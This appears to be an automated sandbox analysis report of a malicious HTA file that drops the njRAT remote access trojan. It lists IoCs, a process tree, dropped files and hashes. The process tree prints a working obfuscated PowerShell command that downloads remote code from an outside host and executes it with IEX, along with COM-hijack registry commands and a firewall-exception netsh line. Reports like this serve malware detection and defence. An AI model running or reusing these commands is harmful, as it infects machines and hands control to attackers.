Analysis
-
max time kernel
146s -
max time network
142s -
platform
windows10-2004_x64 -
resource
win10v2004-20220722-en -
resource tags
arch:x64arch:x86image:win10v2004-20220722-enlocale:en-usos:windows10-2004-x64system -
submitted
09-08-2022 19:09
Static task
static1
Behavioral task
behavioral1
Sample
enc.hta
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
enc.hta
Resource
win10v2004-20220722-en
General
-
Target
enc.hta
-
Size
4KB
-
MD5
a22a14258d33638343e40b4ef674b06d
-
SHA1
172a63be58e0a1c0d4a4b0a933d74b6af9164ddc
-
SHA256
5ea0ac297ec8f31acc2fa0c4475d2bcf044b2699e2417a8aa650d1b742ade518
-
SHA512
eb1c994e51bb36dbbbe54e64d642276e6924d332611c072ef215ff0cd17439187ca15467f1848526a1fd9c279b96c4cd2446e83fd992eb94c58daa965a1eda58
Malware Config
Extracted
njrat
1.9
HacKed
Microsoft.Exe
-
reg_key
Microsoft.Exe
Signatures
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
POWERSHELL.exePOWERSHELL.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4064 3404 POWERSHELL.exe Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 2172 3404 POWERSHELL.exe -
Blocklisted process makes network request 1 IoCs
Processes:
POWERSHELL.exeflow pid process 14 4064 POWERSHELL.exe -
Modifies Windows Firewall 1 TTPs 1 IoCs
-
Registers COM server for autorun 1 TTPs 2 IoCs
Processes:
reg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 580 set thread context of 2168 580 powershell.exe aspnet_compiler.exe -
Modifies registry class 4 IoCs
Processes:
reg.exereg.exedescription ioc process Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\ reg.exe Key created \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-3463845317-933582289-45817732-1000_Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32\ = "C:\\IDontExist.dll" reg.exe -
Modifies registry key 1 TTPs 2 IoCs
-
Suspicious behavior: EnumeratesProcesses 9 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exepid process 4064 POWERSHELL.exe 4064 POWERSHELL.exe 4072 powershell.exe 4072 powershell.exe 2172 POWERSHELL.exe 2172 POWERSHELL.exe 580 powershell.exe 580 powershell.exe 580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.exepowershell.exedescription pid process Token: SeDebugPrivilege 4064 POWERSHELL.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeDebugPrivilege 2172 POWERSHELL.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeDebugPrivilege 580 powershell.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe Token: 34 4072 powershell.exe Token: 35 4072 powershell.exe Token: 36 4072 powershell.exe Token: SeIncreaseQuotaPrivilege 4072 powershell.exe Token: SeSecurityPrivilege 4072 powershell.exe Token: SeTakeOwnershipPrivilege 4072 powershell.exe Token: SeLoadDriverPrivilege 4072 powershell.exe Token: SeSystemProfilePrivilege 4072 powershell.exe Token: SeSystemtimePrivilege 4072 powershell.exe Token: SeProfSingleProcessPrivilege 4072 powershell.exe Token: SeIncBasePriorityPrivilege 4072 powershell.exe Token: SeCreatePagefilePrivilege 4072 powershell.exe Token: SeBackupPrivilege 4072 powershell.exe Token: SeRestorePrivilege 4072 powershell.exe Token: SeShutdownPrivilege 4072 powershell.exe Token: SeDebugPrivilege 4072 powershell.exe Token: SeSystemEnvironmentPrivilege 4072 powershell.exe Token: SeRemoteShutdownPrivilege 4072 powershell.exe Token: SeUndockPrivilege 4072 powershell.exe Token: SeManageVolumePrivilege 4072 powershell.exe Token: 33 4072 powershell.exe -
Suspicious use of WriteProcessMemory 25 IoCs
Processes:
POWERSHELL.exepowershell.exePOWERSHELL.execmd.execmd.exepowershell.exeaspnet_compiler.exedescription pid process target process PID 4064 wrote to memory of 4072 4064 POWERSHELL.exe powershell.exe PID 4064 wrote to memory of 4072 4064 POWERSHELL.exe powershell.exe PID 4072 wrote to memory of 1640 4072 powershell.exe WScript.exe PID 4072 wrote to memory of 1640 4072 powershell.exe WScript.exe PID 2172 wrote to memory of 3496 2172 POWERSHELL.exe cmd.exe PID 2172 wrote to memory of 3496 2172 POWERSHELL.exe cmd.exe PID 3496 wrote to memory of 1712 3496 cmd.exe reg.exe PID 3496 wrote to memory of 1712 3496 cmd.exe reg.exe PID 3496 wrote to memory of 1668 3496 cmd.exe reg.exe PID 3496 wrote to memory of 1668 3496 cmd.exe reg.exe PID 3496 wrote to memory of 1956 3496 cmd.exe cmd.exe PID 3496 wrote to memory of 1956 3496 cmd.exe cmd.exe PID 1956 wrote to memory of 580 1956 cmd.exe powershell.exe PID 1956 wrote to memory of 580 1956 cmd.exe powershell.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 580 wrote to memory of 2168 580 powershell.exe aspnet_compiler.exe PID 2168 wrote to memory of 4800 2168 aspnet_compiler.exe netsh.exe PID 2168 wrote to memory of 4800 2168 aspnet_compiler.exe netsh.exe PID 2168 wrote to memory of 4800 2168 aspnet_compiler.exe netsh.exe
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\enc.hta" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL $HFTCVFLOZOSBOCVIDADWLIO = '[#])02!^#13_27<&{+}<&{@y#])02!^#13_27<&{+}<&{@t/##47)<+=%3#+^(*16!&@_\)&!_32%510#])\59(}}17.IO.#])02!^#13_27<&{+}<&{@t)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[\)&!_32%510#])\59(}}17)[$76%=_)7%2/8\\5[#!@7/##47)<+=%3#+^(*16!&@_/{0265}}78<0{&_<$&/3}[d/##47)<+=%3#+^(*16!&@_)[$76%=_)7%2/8\\5[#!@7]'.Replace('#])02!^#13_27<&{+}<&{@','S').Replace('/##47)<+=%3#+^(*16!&@_','E').Replace(')[$76%=_)7%2/8\\5[#!@7','R').Replace('/{0265}}78<0{&_<$&/3}[','A').Replace('\)&!_32%510#])\59(}}17','M');$HDSRYDZAWTNCWJSVNHKAAWK = ($HFTCVFLOZOSBOCVIDADWLIO -Join '')|&('I'+'EX');$HQNBVPIZRQRPUJTZLAHQUHN = '[2)%@85#]@9@4[_^}^=--4/y2)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@1@)2308@8<[+(\]9}\28_1m.N1@)2308@8<[+(\]9}\28_11{-9)%443833)4=724_<1@.W1@)2308@8<[+(\]9}\28_1bR1@)2308@8<[+(\]9}\28_1qu1@)2308@8<[+(\]9}\28_12)%@85#]@9@4[_^}^=--4/1{-9)%443833)4=724_<1@]'.Replace('2)%@85#]@9@4[_^}^=--4/','S').Replace('1@)2308@8<[+(\]9}\28_1','E').Replace('1{-9)%443833)4=724_<1@','T');$HJZPGAAEFSGITSRIZPKUQBS = ($HQNBVPIZRQRPUJTZLAHQUHN -Join '')|&('I'+'EX');$HDUYAYRATSZBQJRJZHWQLLX = '[&1\&@*}8\\)_8^[*1)6%\r4]{/3<*/\(-[_}}))}3{14a-=*6\]7}0^-/#54(0*90<04]{/3<*/\(-[_}}))}3{14'.Replace('[&1\&@*}8\\)_8^[*1)6%\','C').Replace('4]{/3<*/\(-[_}}))}3{14','E').Replace('-=*6\]7}0^-/#54(0*90<0','T');$HNIKFEBTGQHWZRRONHNVHCJ = '[}*_2/#{3_]143@]3_-3993=#_^2&^&=4$[-(8[8$tR3=#_^2&^&=4$[-(8[8$ #127#^(&]1(=}8@$!9*56pon2#127#^(&]1(=}8@$!9*563=#_^2&^&=4$[-(8[8$'.Replace('[}*_2/#{3_]143@]3_-399','G').Replace('3=#_^2&^&=4$[-(8[8$','E').Replace('2#127#^(&]1(=}8@$!9*56','S');$HUDDTIGVYNHICUBUGQZNRZL = 'G#92-1^}48[/]&![(4+{289t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68pon]_7)0}{^)-]<+1)%[51\68#92-1^}48[/]&![(4+{289]_7)0}{^)-]<+1)%[51\68t==58=<^5&7<_9/*&}0+&^1#92-1^}48[/]&![(4+{289am'.Replace(']_7)0}{^)-]<+1)%[51\68','S').Replace('#92-1^}48[/]&![(4+{289','E').Replace('==58=<^5&7<_9/*&}0+&^1','R');$HNSNPLGHWJCBKWXNBDGSZHJ = '2}^0)91!45<5*!)-{[)40-][3\1([^@=-++0=$!8473[a_4@8]2&}\@=9\)7=8$%)-9To][3\1([^@=-++0=$!8473[n_4@8]2&}\@=9\)7=8$%)-9'.Replace('2}^0)91!45<5*!)-{[)40-','R').Replace('][3\1([^@=-++0=$!8473[','E').Replace('_4@8]2&}\@=9\)7=8$%)-9','D');&('I'+'EX')($HDSRYDZAWTNCWJSVNHKAAWK::new($HJZPGAAEFSGITSRIZPKUQBS::$HDUYAYRATSZBQJRJZHWQLLX('https://tradeguru.com.pk/Server.txt').$HNIKFEBTGQHWZRRONHNVHCJ().$HUDDTIGVYNHICUBUGQZNRZL()).$HNSNPLGHWJCBKWXNBDGSZHJ())1⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1'"2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbs"3⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\POWERSHELL.exePOWERSHELL -NoProfile -ExecutionPolicy Bypass -Command C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat1⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.bat""2⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec} /f3⤵
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\reg.exeREG ADD HKCU\Software\Classes\CLSID\{fdb00e52-a214-4aa1-8fba-4357bb0072ec}\InProcServer32 /ve /t REG_SZ /d C:\IDontExist.dll /f3⤵
- Registers COM server for autorun
- Modifies registry class
- Modifies registry key
-
C:\Windows\system32\cmd.execMd.E"x"e /c =PoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePoWerShelL"."eXe -noP -WIn hIdDen -ep ByPaSs -Command "& 'C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1'"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"5⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\netsh.exenetsh firewall add allowedprogram "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe" "aspnet_compiler.exe" ENABLE6⤵
- Modifies Windows Firewall
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\EKJFLROHTOEAZBDFUOCZXX.ps1Filesize
604KB
MD5ab1fce3ab2f6f211da8f8dc30c2b3060
SHA1ae0dff660b20f9209a66029d44b048a63cc80336
SHA2567cb280def1092d641ad3449dd05713c155788034c6e1649d423039c867b562ca
SHA512ed741014733c2bf70bb82e539324a3a8ebca5b56a427675c9ce7ffdbb28d4f113c2d20e6a083ba8580d891e2586190842d6cea1b7cfb5450af02a694b14b5b85
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.batFilesize
706B
MD51a7a326391b638c03d76369946fc0052
SHA17ae0ffd77ec76b94d735265efad35ddd072cdf36
SHA2560223739ebea16b1f70bf88f3eb43afd01c315c1e7142a72bf8931bb6be9ea09f
SHA512449ce3c15d2d36e42c00c9f9b1df759aa830de931532ee17d16ff6b50a8fe3d180ae474e2e8aca66e9af47df434293f3d96367dedaa91ad1ce60383fe23f9495
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.ps1Filesize
3KB
MD589879c7e1b80b9171b57ec7290c50cf8
SHA14d2761deb7c46b99f5c8ebc4329f0ccd5b3aace3
SHA256dc8f58abd89fed28b00f23da6657188e40dde2da65c254c12a38c4ed1984c6b2
SHA512d8f579f01ddba32beb1cc578fd798b6e8790073261fdd71c4b5b0a277766a68833ca5834b006e9e9c3582f2476fa77b8019e98f744dafdf56f9e0239afe1dd3b
-
C:\ProgramData\QKACGFYHYHFGPQVDAPBHQB\QKACGFYHYHFGPQVDAPBHQB.vbsFilesize
1KB
MD577d9ab54d90a588d38b4a402d7cf25bb
SHA1f72cf4ad3106815b8f3dc9ab804ae285b6bad1e6
SHA25625f09c56e34e4a61e8e57e453c2a3ed05ff33b6e10f1d78af94301ddf312a9f4
SHA512c2054a0e6df593a318fd310b82ed43cb8cf8f89b58bd784acd3ec5ca2a7b039f7fc2848a7641cc43215c0656ea71d3a09ed800d0164c293e5b54bbd27ffe21e6
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\POWERSHELL.exe.logFilesize
3KB
MD500e7da020005370a518c26d5deb40691
SHA1389b34fdb01997f1de74a5a2be0ff656280c0432
SHA256a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe
SHA5129a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD57920f7b10167a4770de3317326bf1eea
SHA1d1a925c543cdc37c9e138a70f2a983f578da0635
SHA256d5ba09b066b4d0d4cdc6f9c21388a961de07cf8d4b76295e3fa60569969c1f74
SHA5126cdb60de9681e400943522bdd489f4c2802e9f403b6edbdb97112bd467e3c0de581b3d9cf7a60b1162f2e36d111f464af399522bd90e832da2cf87af68397df5
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
1KB
MD5f87b0558f50792e4684d92fb3d271c24
SHA1e745842dfeec7403c04a660ad6a2f2231ba605bb
SHA25661d84320415c97ff5d41de5030ba8b8b77c04295d2137f95de9e947a954a8192
SHA51256275978bc50ff36bd9ace519adc25d204955983ba0394ced54f9a70d063c4445e591df6e697b536a1abce8cd4795b80e572f17ae31063c97926cff4553d51a2
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD57274a07d1b80de6f66290b47588cee3b
SHA1d926b384806c755fe6b9d03f68852765aabb5703
SHA2565eba7517357473e4d5d7ede75c3768069c578d2b0023473fd67f76b373430de8
SHA512b7813fea9091298d48c87b259b0d4473ddc4480667f82ed6b5f8bdfa600590dcbfb1d62cbaca649dcf321d85cb786bf62d48826ab04297a22b7c88439b94bcf3
-
memory/580-156-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/580-147-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/580-145-0x0000000000000000-mapping.dmp
-
memory/1640-138-0x0000000000000000-mapping.dmp
-
memory/1668-143-0x0000000000000000-mapping.dmp
-
memory/1712-142-0x0000000000000000-mapping.dmp
-
memory/1956-144-0x0000000000000000-mapping.dmp
-
memory/2168-153-0x0000000000400000-0x0000000000410000-memory.dmpFilesize
64KB
-
memory/2168-164-0x0000000006220000-0x0000000006286000-memory.dmpFilesize
408KB
-
memory/2168-163-0x0000000005A70000-0x0000000005A7A000-memory.dmpFilesize
40KB
-
memory/2168-161-0x0000000005590000-0x0000000005622000-memory.dmpFilesize
584KB
-
memory/2168-154-0x000000000040BBBE-mapping.dmp
-
memory/2168-160-0x0000000005AA0000-0x0000000006044000-memory.dmpFilesize
5.6MB
-
memory/2168-159-0x0000000005450000-0x00000000054EC000-memory.dmpFilesize
624KB
-
memory/2172-158-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/2172-146-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/3496-140-0x0000000000000000-mapping.dmp
-
memory/4064-152-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/4064-133-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/4064-132-0x000001B6F5210000-0x000001B6F5232000-memory.dmpFilesize
136KB
-
memory/4064-134-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/4072-135-0x0000000000000000-mapping.dmp
-
memory/4072-137-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/4072-149-0x00007FFF7E460000-0x00007FFF7EF21000-memory.dmpFilesize
10.8MB
-
memory/4800-162-0x0000000000000000-mapping.dmp